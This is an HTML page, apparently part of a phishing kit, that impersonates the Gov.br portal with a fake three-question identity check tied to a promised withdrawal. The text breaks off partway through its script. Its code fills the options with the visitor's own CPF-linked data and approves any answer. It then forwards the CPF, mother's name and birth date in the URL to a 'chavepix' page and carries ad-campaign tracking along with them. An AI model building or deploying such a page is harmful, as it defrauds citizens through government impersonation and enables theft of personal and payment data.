<!DOCTYPE html><html lang="pt-BR"><head>
    <!-- UTMify Pixel Code -->
    <script>
      window.pixelId = "68789c1b0184c2e57bc706a6";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.src = "https://cdn.utmify.com.br/scripts/pixel/pixel.js";
      document.head.appendChild(a);
    </script>
    <!-- End UTMify Pixel Code -->
    
    <!-- UTM Capture and Preservation System -->
    <script>
      // Sistema de captura e preservação de UTMs do Facebook Ads
      (function() {
        // Função para capturar UTMs da URL
        function captureUTMs() {
          const urlParams = new URLSearchParams(window.location.search);
          const utmParams = {
            utm_source: urlParams.get('utm_source'),
            utm_campaign: urlParams.get('utm_campaign'),
            utm_medium: urlParams.get('utm_medium'),
            utm_content: urlParams.get('utm_content'),
            utm_term: urlParams.get('utm_term')
          };
          
          // Verificar se há UTMs válidas
          const hasUTMs = Object.values(utmParams).some(value => value && value !== '');
          
          if (hasUTMs) {
            console.log('🎯 UTMs capturadas:', utmParams);
            
            // Salvar UTMs no localStorage para persistência
            localStorage.setItem('energia_utm_data', JSON.stringify(utmParams));
            
            // Salvar também no sessionStorage para uso imediato
            sessionStorage.setItem('energia_utm_data', JSON.stringify(utmParams));
            
            // Adicionar UTMs à URL atual se não estiverem presentes
            addUTMsToCurrentURL(utmParams);
            
            return utmParams;
          } else {
            // Tentar recuperar UTMs salvas
            const savedUTMs = localStorage.getItem('energia_utm_data');
            if (savedUTMs) {
              const parsedUTMs = JSON.parse(savedUTMs);
              console.log('🔄 UTMs recuperadas do localStorage:', parsedUTMs);
              
              // Adicionar UTMs recuperadas à URL atual
              addUTMsToCurrentURL(parsedUTMs);
              
              return parsedUTMs;
            }
          }
          
          return null;
        }
        
        // Função para adicionar UTMs à URL atual
        function addUTMsToCurrentURL(utmParams) {
          const currentURL = new URL(window.location.href);
          let hasChanges = false;
          
          Object.entries(utmParams).forEach(([key, value]) => {
            if (value && !currentURL.searchParams.has(key)) {
              currentURL.searchParams.set(key, value);
              hasChanges = true;
            }
          });
          
          if (hasChanges) {
            // Atualizar URL sem recarregar a página
            window.history.replaceState({}, '', currentURL.toString());
            console.log('🔗 URL atualizada com UTMs:', currentURL.toString());
          }
        }
        
        // Função para obter UTMs atuais
        window.getCurrentUTMs = function() {
          const savedUTMs = localStorage.getItem('energia_utm_data');
          return savedUTMs ? JSON.parse(savedUTMs) : null;
        };
        
        // Função para adicionar UTMs a qualquer URL
        window.addUTMsToURL = function(url) {
          const utmData = window.getCurrentUTMs();
          if (!utmData) return url;
          
          const urlObj = new URL(url, window.location.origin);
          Object.entries(utmData).forEach(([key, value]) => {
            if (value) {
              urlObj.searchParams.set(key, value);
            }
          });
          
          return urlObj.toString();
        };
        
        // Função para navegar mantendo UTMs
        window.navigateWithUTMs = function(url) {
          const urlWithUTMs = window.addUTMsToURL(url);
          window.location.href = urlWithUTMs;
        };
        
        // Executar captura quando a página carregar
        document.addEventListener('DOMContentLoaded', function() {
          const capturedUTMs = captureUTMs();
          
          if (capturedUTMs) {
            console.log('✅ Sistema de UTMs ativo:', capturedUTMs);
          } else {
            console.log('ℹ️ Nenhuma UTM detectada');
          }
        });
        
        // Capturar UTMs imediatamente se a página já carregou
        if (document.readyState === 'loading') {
          document.addEventListener('DOMContentLoaded', captureUTMs);
        } else {
          captureUTMs();
        }
      })();
    </script>
    <meta charset="UTF-8">
    <link rel="icon" type="image/png" href="images/960px-Canal_Gov_Logo.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Validação de Identidade - Gov.br</title>

    <!-- Tailwind CSS -->
    <script src="https://cdn.tailwindcss.com"></script>
    <!-- User Data Manager -->
    <script src="../../js/user-data-manager.js"></script>
    <script>
      tailwind.config = {
        theme: {
          extend: {
            colors: {
              "gov-blue": "#1351B4",
              "gov-blue-light": "#2670E8",
              "aneel-blue": "#0d3c78",
              "aneel-blue-dark": "#1a4c8b",
            },
          },
        },
      };
    </script>

    <!-- Remix Icons -->
    <link href="css/remixicon.css" rel="stylesheet">

    <style>
      /* Animation for fade-in */
      @keyframes fade-in {
        from {
          opacity: 0;
          transform: translateY(10px);
        }
        to {
          opacity: 1;
          transform: translateY(0);
        }
      }

      .animate-fade-in {
        animation: fade-in 0.5s ease-out;
      }

      /* Estilos para respostas corretas e incorretas */
      .validation-option.correct {
        background-color: #10b981 !important;
        border-color: #10b981 !important;
        color: white !important;
      }

      .validation-option.incorrect {
        background-color: #ef4444 !important;
        border-color: #ef4444 !important;
        color: white !important;
      }

      .validation-option.correct:hover,
      .validation-option.incorrect:hover {
        transform: none;
      }

      .validation-option {
        transition: all 0.2s ease;
      }

      .validation-option:hover {
        transform: translateY(-2px);
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      }

      .validation-option.selected {
        background-color: #3b82f6;
        border-color: #3b82f6;
        color: white;
      }
    </style>
  </head>

  <body class="bg-gray-50">
    <div class="min-h-screen bg-gray-100">
      <!-- Header -->
      <header class="bg-white border-b border-gray-200 px-3 py-4">
        <div class="flex items-center justify-between">
          <div class="flex items-center">
            <img alt="gov.br" loading="lazy" width="120" height="40" decoding="async" data-nimg="1" class="h-8 w-auto" src="images/960px-Canal_Gov_Logo.png" style="color: transparent;">
          </div>
          <div class="flex items-center gap-4">
            <div class="relative">
              <button aria-label="Perfil do usuário" class="w-8 h-8 bg-blue-600 rounded-full flex items-center justify-center hover:bg-blue-700 transition-colors focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-offset-2">
                <svg fill="currentColor" viewBox="0 0 20 20" class="w-5 h-5 text-white">
                  <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                </svg>
              </button>
              <div class="absolute right-0 top-full mt-2 w-80 bg-white rounded-lg shadow-xl border border-gray-200 z-50 overflow-hidden hidden" id="user-dropdown">
                <button class="absolute top-4 right-4 text-gray-400 hover:text-gray-600 transition-colors" onclick="toggleDropdown()">
                  <svg fill="currentColor" viewBox="0 0 20 20" class="w-5 h-5">
                    <path fill-rule="evenodd" d="M4.293 4.293a1 1 0 011.414 0L10 8.586l4.293-4.293a1 1 0 111.414 1.414L11.414 10l4.293 4.293a1 1 0 01-1.414 1.414L10 11.414l-4.293 4.293a1 1 0 01-1.414-1.414L8.586 10 4.293 5.707a1 1 0 010-1.414z" clip-rule="evenodd"></path>
                  </svg>
                </button>
                <div class="p-6 text-center border-b border-gray-100">
                  <div class="w-16 h-16 bg-gray-300 rounded-full flex items-center justify-center mx-auto mb-3">
                    <svg fill="currentColor" viewBox="0 0 20 20" class="w-8 h-8 text-white">
                      <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                    </svg>
                  </div>
                  <h3 class="text-lg font-medium text-gray-900 mb-2" data-user-greeting="">Olá, Silvio!</h3>
                  <div class="bg-yellow-400 text-black text-xs font-bold py-1 px-3 rounded-full inline-block mb-3">SUA CONTA GOV.BR É NÍVEL OURO</div>
                  <a href="#" class="text-blue-600 hover:text-blue-700 text-sm font-medium flex items-center justify-center gap-1">
                    Minha área gov.br
                    <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                      <path fill-rule="evenodd" d="M10.293 3.293a1 1 0 011.414 0l6 6a1 1 0 010 1.414l-6 6a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-4.293-4.293a1 1 0 010-1.414z" clip-rule="evenodd"></path>
                    </svg>
                  </a>
                </div>
                <div class="p-4">
                  <h4 class="text-sm font-medium text-gray-900 mb-3">Minha conta</h4>
                  <div class="space-y-1">
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                      </svg>
                      Dados Pessoais
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2-2H5a2 2 0 01-2-2v-5a2 2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z" clip-rule="evenodd"></path>
                      </svg>
                      Segurança da Conta
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path d="M13 6a3 3 0 11-6 0 3 3 0 016 0zM18 8a2 2 0 11-4 0 2 2 0 014 0zM14 15a4 4 0 00-8 0v3h8v-3z"></path>
                      </svg>
                      Privacidade
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-8-3a1 1 0 00-.867.5 1 1 0 11-1.731-1A3 3 0 0113 8a3.001 3.001 0 01-2 2.83V11a1 1 0 11-2 0v-1a1 1 0 011-1 1 1 0 100-2zm0 8a1 1 0 100-2 1 1 0 000 2z" clip-rule="evenodd"></path>
                      </svg>
                      Ajuda da conta gov.br
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M3 3a1 1 0 00-1 1v12a1 1 0 102 0V4a1 1 0 00-1-1zm10.293 9.293a1 1 0 001.414 1.414l3-3a1 1 0 000-1.414l-3-3a1 1 0 10-1.414 1.414L14.586 9H7a1 1 0 100 2h7.586l-1.293 1.293z" clip-rule="evenodd"></path>
                      </svg>
                      Sair
                    </button>
                  </div>
                </div>
                <div class="absolute bottom-4 right-4">
                  <button class="w-8 h-8 bg-blue-600 rounded-full flex items-center justify-center text-white hover:bg-blue-700 transition-colors">
                    <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                      <path d="M10 2a1 1 0 011 1v1a1 1 0 11-2 0V3a1 1 0 011-1zm4 8a4 4 0 11-8 0 4 4 0 018 0zm-.464 4.95l.707.707a1 1 0 001.414-1.414l-.707-.707a1 1 0 00-1.414 1.414zm2.12-10.607a1 1 0 010 1.414l-.706.707a1 1 0 11-1.414-1.414l.707-.707a1 1 0 011.414 0zM17 11a1 1 0 100-2h-1a1 1 0 100 2h1zm-7 4a1 1 0 011 1v1a1 1 0 11-2 0v-1a1 1 0 011-1zM5.05 6.464A1 1 0 106.465 5.05l-.708-.707a1 1 0 00-1.414 1.414l.707.707zm1.414 8.486l-.707.707a1 1 0 01-1.414-1.414l.707-.707a1 1 0 011.414 1.414zM4 11a1 1 0 100-2H3a1 1 0 000 2h1z" fill-rule="evenodd" clip-rule="evenodd"></path>
                    </svg>
                  </button>
                </div>
              </div>
            </div>
          </div>
        </div>
      </header>

    <!-- Main Content -->
    <main class="px-0 md:px-1 py-4 md:flex md:justify-center md:items-start md:pt-8">
      <div class="bg-white rounded-none md:rounded-lg shadow-none md:shadow-sm border-0 md:border border-gray-200 p-3 mx-0 md:mx-1 md:max-w-2xl w-full">
        
        <!-- Etapa 1: Nome da Mãe -->
        <div id="step1" class="animate-fade-in">
          <div class="text-center mb-8">
            <h1 class="text-2xl font-bold text-gray-800 mb-2">Validação de Identidade</h1>
            <p class="text-gray-600 mb-4">Responda 3 perguntas para confirmar sua identidade</p>
            <div class="flex items-center justify-center gap-2 mb-6">
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-blue-500 text-white">1</div>
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-gray-200 text-gray-500">2</div>
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-gray-200 text-gray-500">3</div>
            </div>
          </div>
          
          <div class="space-y-6">
            <div class="text-center">
              <h2 class="text-xl font-bold text-gray-800 mb-2">Pergunta 1 de 3</h2>
              <p class="text-gray-600">Qual é o nome completo da sua mãe?</p>
            </div>
            
            <div class="space-y-3">
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(1, 'Nenhum')">
                <div class="flex items-center justify-between">
                  <span>Nenhum</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(1, 'Maria da Silva Santos')">
                <div class="flex items-center justify-between">
                  <span>Maria da Silva Santos</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(1, 'Ana Paula Oliveira')">
                <div class="flex items-center justify-between">
                  <span>Ana Paula Oliveira</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(1, 'José Carlos Ferreira')">
                <div class="flex items-center justify-between">
                  <span>José Carlos Ferreira</span>
                </div>
              </button>
            </div>
          </div>
          
          <div class="mt-8 p-4 bg-blue-50 border border-blue-200 rounded-lg">
            <div class="flex items-center gap-2 mb-2">
              <svg class="w-5 h-5 text-blue-600" fill="currentColor" viewBox="0 0 20 20">
                <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7-4a1 1 0 11-2 0 1 1 0 012 0zM9 9a1 1 0 000 2v3a1 1 0 001 1h1a1 1 0 100-2v-3a1 1 0 00-1-1H9z" clip-rule="evenodd"></path>
              </svg>
              <h3 class="font-semibold text-blue-800">Validação de Segurança</h3>
            </div>
            <p class="text-blue-700 text-sm">Esta etapa é necessária para confirmar sua identidade e garantir a segurança do processo. Selecione apenas as informações que correspondem aos seus dados pessoais.</p>
          </div>
        </div>

        <!-- Etapa 2: Data de Nascimento -->
        <div id="step2" class="animate-fade-in hidden">
          <div class="text-center mb-8">
            <h1 class="text-2xl font-bold text-gray-800 mb-2">Validação de Identidade</h1>
            <p class="text-gray-600 mb-4">Responda 3 perguntas para confirmar sua identidade</p>
            <div class="flex items-center justify-center gap-2 mb-6">
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-green-500 text-white">✓</div>
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-blue-500 text-white">2</div>
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-gray-200 text-gray-500">3</div>
            </div>
          </div>
          
          <div class="space-y-6">
            <div class="text-center">
              <h2 class="text-xl font-bold text-gray-800 mb-2">Pergunta 2 de 3</h2>
              <p class="text-gray-600">Qual é a sua data de nascimento?</p>
            </div>
            
            <div class="space-y-3">
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(2, '15/12/1975')">
                <div class="flex items-center justify-between">
                  <span>15/12/1975</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(2, '08/11/1992')">
                <div class="flex items-center justify-between">
                  <span>08/11/1992</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(2, '15/03/1985')">
                <div class="flex items-center justify-between">
                  <span>15/03/1985</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(2, '22/07/1978')">
                <div class="flex items-center justify-between">
                  <span>22/07/1978</span>
                </div>
              </button>
            </div>
          </div>
          
          <div class="mt-8 p-4 bg-blue-50 border border-blue-200 rounded-lg">
            <div class="flex items-center gap-2 mb-2">
              <svg class="w-5 h-5 text-blue-600" fill="currentColor" viewBox="0 0 20 20">
                <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7-4a1 1 0 11-2 0 1 1 0 012 0zM9 9a1 1 0 000 2v3a1 1 0 001 1h1a1 1 0 100-2v-3a1 1 0 00-1-1H9z" clip-rule="evenodd"></path>
              </svg>
              <h3 class="font-semibold text-blue-800">Validação de Segurança</h3>
            </div>
            <p class="text-blue-700 text-sm">Esta etapa é necessária para confirmar sua identidade e garantir a segurança do processo. Selecione apenas as informações que correspondem aos seus dados pessoais.</p>
          </div>
        </div>

        <!-- Etapa 3: Estado Civil -->
        <div id="step3" class="animate-fade-in hidden">
          <div class="text-center mb-8">
            <h1 class="text-2xl font-bold text-gray-800 mb-2">Validação de Identidade</h1>
            <p class="text-gray-600 mb-4">Responda 3 perguntas para confirmar sua identidade</p>
            <div class="flex items-center justify-center gap-2 mb-6">
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-green-500 text-white">✓</div>
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-green-500 text-white">✓</div>
              <div class="w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold bg-blue-500 text-white">3</div>
            </div>
          </div>
          
          <div class="space-y-6">
            <div class="text-center">
              <h2 class="text-xl font-bold text-gray-800 mb-2">Pergunta 3 de 3</h2>
              <p class="text-gray-600">Qual é o seu estado civil atual?</p>
            </div>
            
            <div class="space-y-3">
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(3, 'Solteiro(a)')">
                <div class="flex items-center justify-between">
                  <span>Solteiro(a)</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(3, 'Casado(a)')">
                <div class="flex items-center justify-between">
                  <span>Casado(a)</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(3, 'Divorciado(a)')">
                <div class="flex items-center justify-between">
                  <span>Divorciado(a)</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(3, 'Viúvo(a)')">
                <div class="flex items-center justify-between">
                  <span>Viúvo(a)</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(3, 'Separado(a)')">
                <div class="flex items-center justify-between">
                  <span>Separado(a)</span>
                </div>
              </button>
              <button type="button" class="validation-option w-full p-4 text-left border-2 rounded-lg font-medium bg-white text-gray-700 border-gray-200 hover:border-blue-300 hover:bg-blue-50" onclick="selectAnswer(3, 'União Estável')">
                <div class="flex items-center justify-between">
                  <span>União Estável</span>
                </div>
              </button>
            </div>
          </div>
          
          <div class="mt-8 p-4 bg-blue-50 border border-blue-200 rounded-lg">
            <div class="flex items-center gap-2 mb-2">
              <svg class="w-5 h-5 text-blue-600" fill="currentColor" viewBox="0 0 20 20">
                <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7-4a1 1 0 11-2 0 1 1 0 012 0zM9 9a1 1 0 000 2v3a1 1 0 001 1h1a1 1 0 100-2v-3a1 1 0 00-1-1H9z" clip-rule="evenodd"></path>
              </svg>
              <h3 class="font-semibold text-blue-800">Validação de Segurança</h3>
            </div>
            <p class="text-blue-700 text-sm">Esta etapa é necessária para confirmar sua identidade e garantir a segurança do processo. Selecione apenas as informações que correspondem aos seus dados pessoais.</p>
          </div>
        </div>

        <!-- Validação Concluída -->
        <div id="validation-complete" class="animate-fade-in hidden text-center">
          <div class="mb-8">
            <div class="w-16 h-16 bg-green-500 rounded-full flex items-center justify-center mx-auto mb-4">
              <svg fill="currentColor" viewBox="0 0 20 20" class="w-8 h-8 text-white">
                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm3.707-9.293a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clip-rule="evenodd"></path>
              </svg>
            </div>
            <h1 class="text-2xl font-bold text-gray-800 mb-2">Validação Concluída!</h1>
            <p class="text-gray-600">Sua identidade foi verificada com sucesso</p>
          </div>
          
          <div class="p-6 bg-green-50 border border-green-200 rounded-lg mb-8">
            <div class="flex items-center gap-2 mb-2">
              <svg fill="currentColor" viewBox="0 0 20 20" class="w-5 h-5 text-green-600">
                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm3.707-9.293a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clip-rule="evenodd"></path>
              </svg>
              <h3 class="font-semibold text-green-800">Identidade Verificada</h3>
            </div>
            <p class="text-green-700 text-sm">Todas as informações foram validadas. Você pode prosseguir com o processo de saque.</p>
          </div>
          
          <button onclick="proceedToNextStep()" class="w-full px-8 py-4 font-bold text-lg rounded-full transition-all duration-300 flex items-center justify-center gap-2 bg-green-600 hover:bg-green-700 text-white transform hover:scale-105">
            <svg fill="currentColor" viewBox="0 0 20 20" class="w-5 h-5">
              <path fill-rule="evenodd" d="M10.293 3.293a1 1 0 011.414 0l6 6a1 1 0 010 1.414l-6 6a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-4.293-4.293a1 1 0 010-1.414z" clip-rule="evenodd"></path>
            </svg>
            PROSSEGUIR COM O SAQUE
          </button>
        </div>

      </div>
    </main>
    </div>

    <!-- Footer -->
    <footer class="bg-gray-800 text-white mt-12">
      <div class="max-w-6xl mx-auto px-4 py-8">
        <div class="text-center">
          <img src="images/960px-Canal_Gov_Logo.png" alt="Gov.br" class="h-10 mx-auto mb-4 filter brightness-0 invert">
          <p class="text-gray-400">� 2024 Governo Federal. Todos os direitos reservados.</p>
        </div>
      </div>
    </footer>

    <script>
      let currentStep = 1;
      let answers = {};

      // Função para controlar o dropdown do usuário
      function toggleDropdown() {
        const dropdown = document.getElementById('user-dropdown');
        dropdown.classList.toggle('hidden');
      }

      // Função para selecionar uma resposta
      function selectAnswer(step, answer) {
        answers[step] = answer;
        
        // Remover seleção anterior
        const currentStepElement = document.getElementById(`step${step}`);
        const buttons = currentStepElement.querySelectorAll('.validation-option');
        buttons.forEach(btn => btn.classList.remove('selected'));
        
        // Adicionar seleção atual
        event.target.closest('.validation-option').classList.add('selected');
        
        // Aguardar um momento e avançar para próxima etapa
        setTimeout(() => {
          nextStep();
        }, 800);
      }

      // Função para avançar para próxima etapa
      function nextStep() {
        // Esconder etapa atual
        document.getElementById(`step${currentStep}`).classList.add('hidden');
        
        currentStep++;
        
        if (currentStep <= 3) {
          // Mostrar próxima etapa
          document.getElementById(`step${currentStep}`).classList.remove('hidden');
        } else {
          // Mostrar tela de validação concluída
          document.getElementById('validation-complete').classList.remove('hidden');
        }
      }

      // Função para prosseguir após validação
      function proceedToNextStep() {
        console.log('🚀 Redirecionando para chavepix...');
        
        // Obter dados da URL atual para propagar
        const urlParams = new URLSearchParams(window.location.search);
        let userData = null;
        
        if (urlParams.has('nome') || urlParams.has('cpf')) {
          userData = {
            nome: urlParams.get('nome'),
            cpf: urlParams.get('cpf'),
            nascimento: urlParams.get('nascimento'),
            nomeMae: urlParams.get('nomeMae'),
            estadoCivil: urlParams.get('estadoCivil'),
            nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
          };
          console.log('🔗 Dados encontrados na URL para propagar:', userData);
        }
        
        // Construir URL com dados
        let targetURL = '../chavepix/index.html';
        
        if (userData) {
          const params = new URLSearchParams();
          
          // Adicionar dados do usuário
          if (userData.nome) params.set('nome', userData.nome);
          if (userData.cpf) params.set('cpf', userData.cpf);
          if (userData.nascimento) params.set('nascimento', userData.nascimento);
          if (userData.nomeMae) params.set('nomeMae', userData.nomeMae);
          if (userData.estadoCivil) params.set('estadoCivil', userData.estadoCivil);
          if (userData.nomeCompleto) params.set('nomeCompleto', userData.nomeCompleto);
          
          // Preservar UTMs
          ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content'].forEach(utm => {
            if (urlParams.has(utm)) {
              params.set(utm, urlParams.get(utm));
            }
          });
          
          if (params.toString()) {
            targetURL += '?' + params.toString();
          }
          
          console.log('🔗 URL com dados:', targetURL);
        }
        
        // Redirecionar para chavepix preservando dados
        if (typeof window.navigateWithUTMs === 'function' && !userData) {
          window.navigateWithUTMs('../chavepix/index.html');
        } else {
          window.location.href = targetURL;
        }
      }

      // Sistema de validação dinâmica baseada em dados reais
      function setupDynamicValidation() {
        // PRIORIDADE 1: Verificar dados na URL
        const urlParams = new URLSearchParams(window.location.search);
        console.log('🔗 Verificando dados na URL...');
        
        // Debug: Verificar se sessionStorage tem dados
        const sessionData = sessionStorage.getItem('userData');
        console.log('🔍 SessionStorage userData:', sessionData);
        
        // Debug: Verificar se user-data-manager carregou
        console.log('🔍 window.UserDataManager:', window.UserDataManager);
        console.log('🔍 window.getUserData:', window.getUserData);
        
        // Aguardar carregamento do sistema de dados
        setTimeout(() => {
          let userData = null;
          
          // PRIORIDADE 1: Verificar dados na URL
          if (urlParams.has('nome') || urlParams.has('cpf')) {
            console.log('🔗 Dados encontrados na URL');
            userData = {
              nome: urlParams.get('nome'),
              cpf: urlParams.get('cpf'),
              nascimento: urlParams.get('nascimento'),
              nomeMae: urlParams.get('nomeMae'),
              estadoCivil: urlParams.get('estadoCivil'),
              nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
            };
            console.log('✅ Dados carregados da URL:', userData);
          }
          
          // PRIORIDADE 2: Tentar obter dados via getUserData (só se não tem dados da URL)
          if (!userData && typeof window.getUserData === 'function') {
            try {
              userData = window.getUserData();
              console.log('✅ Dados obtidos via getUserData:', userData);
            } catch (error) {
              console.log('❌ Erro ao usar getUserData:', error);
            }
          }
          
          // PRIORIDADE 3: Fallback - tentar obter dados diretamente do sessionStorage
          if (!userData && sessionData) {
            try {
              userData = JSON.parse(sessionData);
              console.log('✅ Dados obtidos via sessionStorage:', userData);
            } catch (error) {
              console.log('❌ Erro ao parsear sessionStorage:', error);
            }
          }
          
          // Se ainda não tem dados, PARAR - não usar dados padrão
          if (!userData) {
            console.log('❌ ERRO: Nenhum dado disponível para validação!');
            alert('Erro: Dados do usuário não encontrados. Por favor, refaça a consulta.');
            return;
          }
          
          console.log('� Configurando validação com dados:', userData);
          
          // Atualizar perguntas com dados reais
          updateValidationQuestions(userData);
          
          // Salvar dados processados globalmente para uso nas funções de validação
          window.currentUserData = userData;
          
        }, 1000); // Aumentar tempo para garantir que user-data-manager carregue
      }

      function updateValidationQuestions(userData) {
        console.log('🔧 Atualizando perguntas de validação com dados:', userData);
        
        if (!userData) {
          console.log('⚠️ Nenhum dado fornecido para atualização das perguntas');
          return;
        }
        
        // Pergunta 1: Nome da mãe - garantir que a resposta correta esteja disponível
        const motherOptions = document.querySelectorAll('#step1 .validation-option span');
        if (motherOptions.length >= 3) {
          let correctMotherName = userData.nomeMae;
          
          // Se não tem nome da mãe ou está vazio, usar "Nenhum"
          if (!correctMotherName || correctMotherName.trim() === '') {
            correctMotherName = 'Nenhum';
            console.log('🔧 Nome da mãe vazio - usando "Nenhum" como resposta correta');
          } else {
            console.log('🔧 Nome da mãe encontrado:', correctMotherName);
          }
          
          // Verificar se a resposta correta já está nas opções
          const hasCorrectOption = Array.from(motherOptions).some(option => 
            option.textContent.trim() === correctMotherName
          );
          
          if (!hasCorrectOption) {
            // Substituir a segunda opção (Maria da Silva Santos) pela resposta correta
            motherOptions[1].textContent = correctMotherName;
            const button = motherOptions[1].closest('button');
            if (button) {
              button.setAttribute('onclick', `selectAnswer(1, '${correctMotherName}')`);
              console.log('🔧 Opção de nome da mãe atualizada para:', correctMotherName);
            }
          }
        }
        
        // Pergunta 2: Data de nascimento
        const birthOptions = document.querySelectorAll('#step2 .validation-option span');
        if (birthOptions.length >= 3 && userData.nascimento) {
          const correctBirthDate = userData.nascimento;
          
          // Verificar se a data correta já está nas opções
          const hasCorrectOption = Array.from(birthOptions).some(option => 
            option.textContent.trim() === correctBirthDate
          );
          
          if (!hasCorrectOption) {
            // Substituir a primeira opção pela data correta
            birthOptions[0].textContent = correctBirthDate;
            const button = birthOptions[0].closest('button');
            if (button) {
              button.setAttribute('onclick', `selectAnswer(2, '${correctBirthDate}')`);
              console.log('🔧 Opção de data de nascimento atualizada para:', correctBirthDate);
            }
          }
        }
        
        // Pergunta 3: Estado civil
        const maritalOptions = document.querySelectorAll('#step3 .validation-option span');
        if (maritalOptions.length >= 3 && userData.estadoCivil) {
